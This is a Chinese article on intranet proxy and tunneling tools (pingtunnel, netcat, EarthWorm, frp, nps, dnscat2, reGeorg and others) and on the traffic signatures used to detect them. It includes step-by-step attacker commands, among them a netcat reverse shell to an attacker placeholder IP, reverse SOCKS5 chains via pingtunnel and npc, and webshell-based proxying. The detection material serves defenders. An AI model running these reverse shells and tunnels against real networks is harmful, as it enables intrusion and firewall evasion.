内网代理工具与检测方法研究

> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码， 原文地址 [www.tuicool.com](https://www.tuicool.com/articles/2Yb2ayJ)

1、相关概念
------

#### 1.1 隧道技术的概念

今天想跟大家聊一聊常用的内网代理工具和对这些工具常见的检测方法。内网代理一般使用隧道技术，援引一段百度百科对 “隧道技术” 的介绍：

隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据 (或负载) 可以是不同协议的数据帧或包。隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息，从而使封装的负载数据能够通过互联网络传递。

被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道。一旦到达网络终点，数据将被解包并转发到最终目的地。注意隧道技术是指包括数据封装、传输和解包在内的全过程。

#### 1.2 正向与反向代理的概念

正向代理和反向代理是资源访问上的两个不同概念，一般来讲有下面两个含义。

正向代理：当客户端无法访问外部资源的时候（由于诸如墙这样的原因），可以通过一个正向代理去间接访问，所以客户端需要配置代理服务器的 ip。正向代理是一个位于客户端和原始服务器之间的服务器，为了从原始服务器取得内容，客户端向代理发送一个请求并指定目标 (原始服务器)，然后代理向原始服务器转交请求并将获得的内容返回给客户端。客户端必须要进行一些特别的设置才能使用正向代理。

反向代理：客户端是无感知代理的存在，以代理服务器来接受 internet 上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给 internet 上请求连接的客户端。

![](https://img1.tuicool.com/3Eraqer.jpg!web)

图 1.2.1 正向与反向代理之间的区别与联系

但是对于渗透攻击者来说，从视角上看到的正向代理和反向代理和传统定义的正向与反向代理有一定区别。简单来说可以这样理解：

正向代理：攻击者主动连接代理服务器

反向代理：代理服务器主动连接攻击者

#### 1.3 内网穿透的具体表现

内网穿透是指通过 “隧道技术” 打通了一条从攻击者到目标机器的通道，主要表现为下面三个方面。

1）反弹 shell

从目标机器能够反弹 shell 到攻击者的外网 vps，攻击者通过反弹回来的 shell 能够很方便的对目标内网进行扫描，这就是反向代理的一种表现形式。

2）端口转发

通过指定一条专门的通道，能够对目标内网某台机器的某个具体端口进行访问，这种端口转发通常是一对一的。

3）sock 代理或者 http 代理

开通一条专门的通道，并且提供 http 代理或者 sock 代理。攻击者可以通过配置响应的代理，直接访问目标内网任意机器，这就是正向代理的一种表现形式。

2、常用隧道介绍
--------

我们进行内网渗透常用的隧道技术有 dns 隧道、http 隧道、ssh 隧道、icmp 隧道、tcp 隧道等。理论上所有的协议都可以作为隧道传输协议，并且传输的数据可以支持自定义的加解密算法。

按照隧道所处的协议层对不同的隧道技术进行分类，大体上可以分为下面几种。

#### 2.1 网络层隧道

#### 2.1.1 ICMP 隧道

#### 2.1.1.1 常见 ICMP 隧道工具

ICMP 隧道是指通过 ICMP 协议来传输数据，ICMP 协议不需要开放新的端口，容易被防火墙放过，是目前目标流行的一种绕过防火墙的数据传输方式之一。

#### 1）icmpsh

icmpsh 是一个比较轻巧的 ICMP 隧道技术工具，能够通过 ICMP 来反弹 shell。优点是不需要目标机器上的 root 权限，缺点是功能单一，反弹回来的 cmd 极不稳定。

由于 icmpsh 对应传输的 ICMP 数据并没有加密，所以通过抓包很容易检测到其中的特征数据，如图 2.1.1.1.1 所示。

![](https://img0.tuicool.com/FVVn6nI.jpg!web)

图 2.1.1.1.1 icmpsh 的数据包流量特征

github: https://github.com/inquisb/icmpsh

使用参考：

https://www.freebuf.com/articles/web/250711.html

#### 2）icmptunnel

icmptunnel 是通过在客户端和服务端分别创建虚拟网卡，利用 ICMP 协议来传输两个虚拟网卡之间的数据。缺点是需要 root 权限，并且要创建网卡，容易被发现。

github: https://github.com/DhavalKapil/icmptunnel

使用参考：

https://www.freebuf.com/articles/network/242015.html

#### 3）pingtunnel

Pingtunnel 是最流行的一款 ICMP 代理工具，提供对 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的功能。

利用条件：需要 root 或者 administrator/system 权限。网上有的说法是不需要管理员权限，本人实际测试中，管理员权限是需要的。

参考：https://github.com/esrrhs/pingtunnel

◆ 构建正向代理的 ICMP 攻击链路

被攻击端：

Victim1  x.x.x.x (公网地址)， 10.29.84.80（内网地址）

Victim2  10.29.84.63（内网地址）

攻击端：

Attack   随意，能上网就行

整个利用过程如下：

① 在 Victim1 的机器上运行代码，运行之后 Victim1 就是 ICMP SERVER。会接受客户端发过来的 ICMP 数据包。

```
./pingtunnel -type server -noprint 1 -nolog 1
```

-type server 代表开启 ICMP SERVER 端，等待客户端进行连接与通信。

-noprint 1 不在控制台打印日志

-nolog 1 不存储日志文件

② 在 Attack 的机器上运行代码，运行之后代表 Attack 的机器开启 4455 端口作为 sock5 代理。

```
pingtunnel.exe -type client -l :4455 -s xx.xx.xx.xx -sock5 1 -noprint 1 -nolog 1
```

其中 xx.xx.xx.xx 替换为 Victim1 对应的 IP

③ 攻击者可以通过 Proxifier 设置全局的 sock5 代理来对目标内网的 Victim2 进行攻击。简单验证的话可以直接在浏览器中设置 sock5 代理。

![](https://img2.tuicool.com/6B3amm6.jpg!web)

图 2.1.1.1.2. 正向代理的 ICMP 攻击链路

正向代理的 ICMP 攻击链路，要求目标机器 1 必须有公网 IP，并且能正常地进行 PING 操作。

◆ 构建反向代理的 ICMP 攻击链路

被攻击端：

Victim1 10.29.84.80（内网地址）

Victim2 10.29.84.63（内网地址）

攻击端：

Attack xx.xx.xx.xx（公网 IP）

反向代理和正向代理的攻击方式相比，就是把运行的代码交换了位置，原来在攻击者机器运行的程序换到目标机器 1 上运行，原来在目标机器 1 上运行的程序换到攻击者机器上运行。

① 在 Attack 的机器上运行代码，运行之后 Attack 就是 ICMP SERVER。会接受客户端发过来的 ICMP 数据包。

```
./pingtunnel -type server -noprint 1 -nolog 1
```

-type server 代表开启 ICMP SERVER 端，等待客户端进行连接与通信。

② 在 Victim1 的机器上运行代码，运行之后代表 Victim1 的机器开启 4455 端口作为 sock5 代理。

```
pingtunnel.exe -type client -l :4455 -s xx.xx.xx.xx -sock5 1 -noprint 1 -nolog 1
```

其中 xx.xx.xx.xx 替换为 Attack 对应的 IP

![](https://img1.tuicool.com/y2U7JjB.jpg!web)

图 2.1.1.1.3 反向代理的 ICMP 攻击链路

但是到目前为止，我们只是在目标机器 1 上开启了一个 sock5 的代理端口 4455，代理之后的请求会通过 ICMP 的请求包进行转发。

#### 2.1.1.2 ICMP 隧道检测技术

#### 1）通过 ICMP 数据包的数量检测

一个正常的 ping 每秒最多只会发送两个数据包，而使用 ICMP 隧道的浏览器在同一时间会产生大量 ICMP 数据包。

![](https://img1.tuicool.com/2uYrUvV.jpg!web)

图 2.1.1.2.1 短时间内产生大量 ICMP 数据包

#### 2）对单个数据包的 DATA 字段大小进行检验

ICMP 隧道数据包中 DATA 往往大于 64 比特

![](https://img0.tuicool.com/AFvmmai.jpg!web)

图 2.1.1.2.2 单个 ICMP 数据包的大小远大于正常数据包

#### 3）寻找响应数据包和请求数据包 payload 不一致的 ICMP 数据包

![](https://img2.tuicool.com/iYzu6rJ.jpg!web)

图 2.1.1.2.3 请求和响应不一致的数据包

```
windows系统下ping默认传输的是：abcdefghijklmnopqrstuvwabcdefghi，共32bytes
linux系统下，ping默认传输的是48bytes，前8bytes随时间变化，后面的固定不变，内容为!”#$%&’()+,-./01234567
```

参考:

https://www.freebuf.com/articles/network/202634.html

#### 4）检查 ICMP 数据包的协议标签

比如 icmptunnel 会在所有 icmp payload 前面加上 TUNL 标识来标识隧道。

![](https://img1.tuicool.com/ABrqy2b.jpg!web)

图 2.1.1.2.4 部分数据包的特殊标识

#### 2.2 传输层隧道

#### 2.2.1 TCP 隧道

#### 2.1.1.1 常见 TCP 隧道工具

#### 1）netcat

又名 nc，使用量最广的反弹 shell 的手段之一，linux 系统一般自带。

地址：https://eternallybored.org/misc/netcat/

使用参考：

https://blog.csdn.net/csacs/article/details/91440568

使用步骤，在服务端监听端口

```
nc -lvvp 8443
```

在客户端连接服务端端口

```
nc.exe -e cmd xx.xx.xx.xx 8443
```

![](https://img2.tuicool.com/u22M73B.jpg!web)

图 2.1.1.1.1 nc 反弹 shell 截图

#### 2）Powercat

powershell 版本的 nc，用法基本上同 nc 一样。

参考：https://github.com/besimorhino/powercat

#### 3）lcx

lcx 是一款比较常见的端口转发工具，上个世纪的产品了，以前用的多，现在已经用的人比较少了，主要是基本上的杀软都会杀。

参考：https://github.com/windworst/LCX

#### 4）HTRAN

功能基本上和 lcx 一样，但是是跨平台的。

参考：

https://github.com/bGN4/HTran/tree/master/HTran

#### 5）Iox

iox 是一款功能强大的端口转发 & 内网代理工具，该工具的功能类似于 lcx 和 ew，但是 iox 的功能和性能都更加强大。

地址：https://github.com/EddieIvan01/iox

参考：

https://www.freebuf.com/articles/network/244567.html

#### 6）NATBypass

使用 go 语言编写的端口转发工具，功能和用法基本上和 lcx 一样，具有很好的跨平台性。

地址：https://github.com/cw1997/NATBypass

#### 7）ew(EarthWorm)

EW 是一套便携式的网络穿透工具，具有 SOCKS v5 服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。EW 自带支持的多级代理机制是的 EW 成为目前最受攻击者喜欢的工具之一。

地址：http://rootkiter.com/EarthWorm/

#### 8）Temite

EarthWorm 的升级版，已经永久停止更新。

地址：http://rootkiter.com/Termite/

#### 9）Venom

Venom 是一款为渗透测试人员设计的使用 Go 开发的多级代理工具。

地址：https://github.com/Dliv3/Venom/

#### 10）Stowaway

Stowaway 是一个利用 go 语言编写的多级代理工具，功能非常类似 Venom。

地址：https://github.com/ph4ntonn/Stowaway

#### 11）Ssocks

正向和反向的 socks 工具，可执行文件的大小很小

地址：https://github.com/54Pany/sSocks

#### 12）frp

frp 是一款轻量级的内网穿透工具，最早是为了方便运维人员远程对目标内网环境进行管理，提供了 tcp 端口转发、http 代理、socks5 代理等功能。

地址：https://github.com/fatedier/frp

#### 13）npc/nps

npc/nps 是一款基于 TCP 协议的代理工具，本身提供基于各种平台的客户端，稳定性好，并且可以自定义数据加密方式。支持端口转发，http 代理，sock5 代理。是目前最受攻击者喜欢的工具之一。

地址：

https://ehang-io.github.io/nps/；

https://github.com/ehang-io/nps

使用 nps/npc 构建反向代理使用步骤

① 在外网的 vps 上面运行

```
docker run --name nps -p 280:80 -p 2443:443 -p 28080:8080 -p 28024:8024 -p 5001-5100:5001-5100 -v /opt/conf:/conf ffdfgdfg/nps
```

② 打开 nps 对应的 web 服务 http://xx.xx.xx.xx:28080/，输入默认口令 admin 123

新建一个客户端地址，记录下生成的随机 key

![](https://img2.tuicool.com/22Qvue6.jpg!web)

③在目标机器上面运行

```
npc -server=xx.xx.xx.xx:28024 -vkey=kow4td3v819abec6 -type=tcp
```

![](https://img2.tuicool.com/EvYz6zj.jpg!web)

④ 在 nps 的管理端，显示连接为 “在线” 之后，点击“隧道”，新增一个 socks5 隧道。

端口选择 5001-5100 中的某个端口。

![](https://img1.tuicool.com/eEFnmiy.jpg!web)

经过上面的步骤之后，我们就在 vps 上面开放了一个 sock5 代理，端口为 5002。连接该代理的请求会直接转发到目标机器内网。

#### 2.1.1.2 TCP 隧道检测技术

不同的工具使用的 TCP 隧道发送和接受数据包的格式都不一样，并且由于 TCP 隧道目前来说相对比较成熟，也导致大多数 TCP 隧道都是属于加密隧道。

对于简单的非加密的隧道工具，通常我们直接从数据包中就能找到很明显的特征。如图 2.1.1.2.1 所示。

![](https://img1.tuicool.com/fIzyY3R.jpg!web)

图 2.1.1.2.1NC 明文传输的 TCP 数据包特征流量

EarthWorm(简称 ew) 是一款比较好用的多级代理转发工具，相较于其他很多工具都要小很多，适用于一些特殊场景。与 nc 相比，EarthWorm 能够提供 socks5 代理的功能，适用性明显更广泛一些。但是从本质上来说 EarthWorm 还是只是流量转发的工具，并没有对流量进行加密，从流量中能够看到明文的内网请求的流量。

![](https://img2.tuicool.com/UFrAFrB.jpg!web)

图 2.1.1.2.2 使用 EW 转发明文的内网请求流量

EW 在建立连接和维持连接的时候也有明显的特征，通过 TCP 连接发送和响应数据包 “xx xx 00 00 00 00” 来保持连接。最开始的时候客户端会向服务端发送“01 01 00 00 00 00”（如图 2.1.1.2.3 所示），服务端会响应“01 02 00 00 00 00”。后面的很多 tcp 包都和这个很相似，可以作为流量匹配的特征。

![](https://img1.tuicool.com/36Zf6bm.jpg!web)

图 2.1.1.2.3 使用 EW 建立连接和维持连接状态的特征包

对于加密传输的数据包流量，就只能针对不同的工具寻找对应不同的特征点。抓了一下 npc 在建立连接之后的特征，npc 的客户端在与服务端建立连接之后，会一直发送带有当前时间信息的数据包。

![](https://img1.tuicool.com/Vve22iq.jpg!web)

图 2.1.1.2.4 NPC 心跳数据包特征

frp 是另一种常用的内网代理工具，使用 frp 建立作为内网代理工具时也有明显的流量特征。在客户端和服务端建立 tcp 连接时，客户端会发送本机基础信息和 frp 版本信息，均为明文的流量信息，如图 2.1.1.2.5 所示。因为 frp 默认使用 TLS 加密数据，tcp 的数据包中会有很多关于 TLS 证书相关的信息，如图 2.1.1.2.6 所示。

![](https://img1.tuicool.com/eIzQ7bE.jpg!web)

图 2.1.1.2.5 frp 连接建立时的流量特征

![](https://img0.tuicool.com/qyaaAfF.jpg!web)

图 2.1.1.2.6 frp 数据包中的 TLS 特征

#### 2.1 网络层隧道

#### 2.2.2 UDP 隧道

#### 2.2.2.1 常见 UDP 隧道工具

#### 1）Udp2raw

一款常见的 UDP 隧道工具，该工具可以利用原始套接字并通过伪造的 TCP/UDP/ICMP 流量来帮助研究人员绕过 UDP 防火墙。

#### 2）frp

frp 既是一款常见的 TCP 隧道工具，也是一款 UDP 隧道工具。

要通过 UDP 协议来转发内网请求，可以通过在 frp 中开启 kcp 模式，如图 2.2.2.1.1 所示。从图中可以看出，使用 UDP 协议和 TCP 协议的流量特征一样的。

![](https://img1.tuicool.com/6zqemyq.jpg!web)

图 2.2.2.1.1 frp 使用 udp 协议搭建内网代理

#### 2.3 应用层隧道

#### 2.3.1 DNS 隧道

#### 2.3.1.1 常见 DNS 隧道工具

#### 1）dnscat2

通过将其他协议封装在 DNS 协议中传输建立通信。因为在我们的网络世界中 DNS 是一个必不可少的服务，所以大部分防火墙和入侵检测设备很少会过滤 DNS 流量，这就给 DNS 作为一种隐蔽信道提供了条件，从而可以利用它实现诸如远程控制，文件传输等操作。

地址：https://github.com/iagox86/dnscat2

#### 2）dnscat2-powrshell

Powershelll 版本的 dnscat2。

地址：https://github.com/lukebaggett/dnscat2-powershell

#### 3）dns2tcp

dns2tcp 是一个利用 DNS 隧道转发 TCP 连接的工具，支持 KEY 和 TXT 类型的请求，用 C 语言开发。它分为两个部分，服务端和客户端，服务端运行在 linux 服务器上，客户端可以运行在 linux 和 windows 上 (其他平台没有测试过)，编译完成后在服务端上的可执行文件名称为 dns2tcpd，在客户端(linux) 上的名称为 dns2tcpc。

地址：https://github.com/alex-sector/dns2tcp

#### 4）Iodine

iodine 是目前比较活跃，知名度比较大的一个 dns tunneling 实现工具，平台覆盖范围广，它可以运行在 Linux, Mac OS X, FreeBSD, NetBSD, OpenBSD 和 Windows 上，甚至还有 android 客户端，不过它需要安装 TUN/TAP。

地址：https://github.com/yarrick/iodine

#### 2.3.1.2 DNS 隧道检测技术

#### 1）通过请求和相应包的大小进行监测

通常 dns tunneling 为了取得较大的带宽，会选择构造尽量大的 dns 请求和响应。

2）检测 TXT 记录类型发送请求和响应，而在正常的 DNS 网络流量中，TXT 记录的比例可能只有 1%-2%，如果时间窗口内，TXT 记录的比例激增，那么也意味着存在异常。

3）还有各种各样的论文，有好多论文都提到了怎么检测 DNS 隧道流量检测。运用了各种算法，看不懂。

#### 2.3.2 SSH 隧道

ssh 隧道通常不使用第三方的工具，直接使用 linux 自带的 openssh 客户端就可以进行端口转发。使用方法如下

```
sudo ssh -Nf -L 192.168.0.159:3334:192.168.213.131:3389 192.168.0.159
```

![](https://img0.tuicool.com/vUV3Uf6.jpg!web)

这里我们用到了 SSH 客户端的三个参数，下面我们一一做出解释：

```
◆ -N 告诉SSH客户端，这个连接不需要执行任何命令。仅仅做端口转发
◆ -f 告诉SSH客户端在后台运行
◆ -L 做本地映射端口，被冒号分割的三个部分含义分别是最后一个参数是我们用来建立隧道的中间机器的IP地址(IP: 192.168.0.159)
◆ 需要使用的本地端口号（端口: 3334)
◆ 需要访问的目标机器IP地址（IP: 192.168.213.131）
◆ 需要访问的目标机器端口（端口: 3389)
```

那么本地局域网的任何机器访问 192.168.0.159:3334 都会自动被映射到 192.168.213.131:3389。

![](https://img0.tuicool.com/e6baMbQ.jpg!web)

图 2.3.2.1 ssh 端口转发之后效果

#### 2.3.3 HTTP 隧道

#### 2.3.3.1 常见的 HTTP 隧道工具

#### 1）reDuh

最早出现的 http 正向代理的工具，能够把 webshell 转化进行端口转发，工具客户端提供 gui 界面。

#### 2）tunnel

属于 reDuh 的升级产品，通过在攻击端使用 python 把 webshell 转化为 sock 代理和端口转发。，目前来说还是有比较大的使用量。

地址：https://github.com/SECFORCE/Tunna

#### 3）reGeoge

reGeoge 属于 tunnel 的替代和升级产品，通过在攻击端使用 python 把 webshell 转化为 sock5 代理。属于目前还比较流行的一种内网穿透方式。

地址：https://github.com/sensepost/reGeorg

具体的使用步骤如下：

◆ 上传对应的 tunnel 文件到服务端，并且进行访问。如图 2.3.3.1.1 所示。

![](https://img1.tuicool.com/ZJbMnmU.jpg!web)

图 2.3.3.1.1 tunnel 文件上传之后返回页面

◆ 本地攻击端通过 python2 运行

python reGeorgSocksProxy.py -p 8888 -u [http://x.x.x.x/tunnel.php](http://x.x.x.x/tunnel.php)

![](https://img0.tuicool.com/JnMBbaa.jpg!web)

图 2.3.3.1.2 通过 webshell 开启本地 sock5 代理

通过上面这两步之后就在本地开启了一个 sock5 代理，通过这个代理就可以直接访问到目标服务器的内网，配合 proxifier 等工具就能对目标内网进行扫描和其他攻击行为。

#### 4）Neo-reGeorg

重构版 reGeorg，提高稳定性和可用性，避免特征检测，更新活跃.

地址：https://github.com/L-codes/Neo-reGeorg

#### 5）ABPTTS

TCP over HTTP, 即通过 HTTP 隧道转发 TCP 连接, 数据加密，可自定义 HTTP 数据，对抗特征检测十分优秀，创建的隧道十分稳定，比较遗憾的是支持的 web 脚本类型只有 aspx 和 jsp。

地址：https://github.com/nccgroup/ABPTTS

#### 2.3.3.2 HTTP 隧道检测技术

http 的隧道通常需要上传一个脚本文件（asp, aspx, php, jsp）。通过脚本文件来复用靶机的 web 端口，构造一条代理链路或者进行端口转发。

#### 1）通过脚本文件页面返回内容进行检测。

reDuh 脚本文件默认返回。

![](https://img2.tuicool.com/eymUrua.jpg!web)

图 2.3.3.2.1 reDuh 脚本默认返回

比如上传 ReGeorg tunnel 文件，页面对应的返回基本上都是下面的页面内容。

![](https://img0.tuicool.com/rimIJnm.jpg!web)

图 2.3.3.2.2 reGeorg 页面默认响应

这种 http 代理类型的工具刚开始的时候都会有一个建立连接的请求包，这个请求包都具有比较明显的特征，如下所示。

![](https://img0.tuicool.com/AVV3IzF.jpg!web)

2.3.3.2.3 reGeorg 请求的默认请求头，其中 Accept-Encoding 字段有特征

![](https://img1.tuicool.com/3aENV3m.jpg!web)

2.3.3.2.4 tunnel 默认的请求头，其中 authorization 字段有特征

#### 2）通过流量中的数据特征来分析攻击行为。

这里的流量特征基本上都是明文信息，只要按照通用的攻击检测技术就可以了。

[原文链接](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247483876&idx=1&sn=b71f016be9f345699efcbffdc27b626f&chksm=c2a1d56df5d65c7bbee6e1052d0405eab5cb6dbb98bd549459b83b5a2ab6b530cd078ca5398e&token=229680544&lang=zh_CN#rd)